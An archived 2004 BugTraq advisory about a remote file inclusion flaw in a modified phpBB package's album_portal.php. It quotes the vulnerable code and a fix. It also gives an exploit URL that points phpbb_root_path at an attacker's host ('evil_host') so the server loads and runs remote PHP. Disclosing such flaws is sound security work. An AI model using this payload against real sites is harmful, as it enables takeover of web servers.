lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 19 Apr 2004 19:50:42 +0200 From: Dariusz 'Officerrr' Kolasinski <ofi@...igon.com.pl> To: BugTraq <bugtraq@...urityfocus.com> Subject: phpBB modified by Przemo arbitary code execution -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - --====----====----====----====----====----====----====----====----====----===-- Product: phpBB modified by Przemo Version: v1.8 Vendor: http://przemo.org/phpBB2/ Discover by: Officerrr <officerrr at poligon.com.pl> Vendor Response: Not contacted yet... Severity: Medium (arbitary code execution as webserver user) - --====----====----====----====----====----====----====----====----====----===-- Description: This modification is based on phpBB 2.0.X script, it contains about 200 add-ons, with ability to switch off any of them in admin`s panel. - --====----====----====----====----====----====----====----====----====----===-- Vulnerable code: File: album_portal.php [code] $album_root_path = $phpbb_root_path . 'album_mod/'; include($album_root_path . 'album_common.'.$phpEx); [/code] - --====----====----====----====----====----====----====----====----====----===-- Fix: Change the following lines in album_portal.php file [code] $album_root_path = $phpbb_root_path . 'album_mod/'; include($album_root_path . 'album_common.'.$phpEx); [/code] to [code] define('IN_PHPBB', true); $phpbb_root_path = './'; $album_root_path = $phpbb_root_path . 'album_mod/'; include($phpbb_root_path . 'extension.inc'); include($album_root_path . 'album_common.'.$phpEx); [/code] - --====----====----====----====----====----====----====----====----====----===-- Exploit: http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php] evil_file.php must exist on the evil_host. - -- Dariusz 'Officerrr' Kolasinski <Linux Administrator> <gg: 516354> "Living on a razors edge, Balancing on a ledge" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAhBFy+p+rYQE3C+ARAsX0AJ4okoVUeq0ehzHMrJJsqPd051kP8wCdE0dc tKFC2tbN1lJSYXJb1sdttRg= =NeZg -----END PGP SIGNATURE-----
Powered by blists - more mailing lists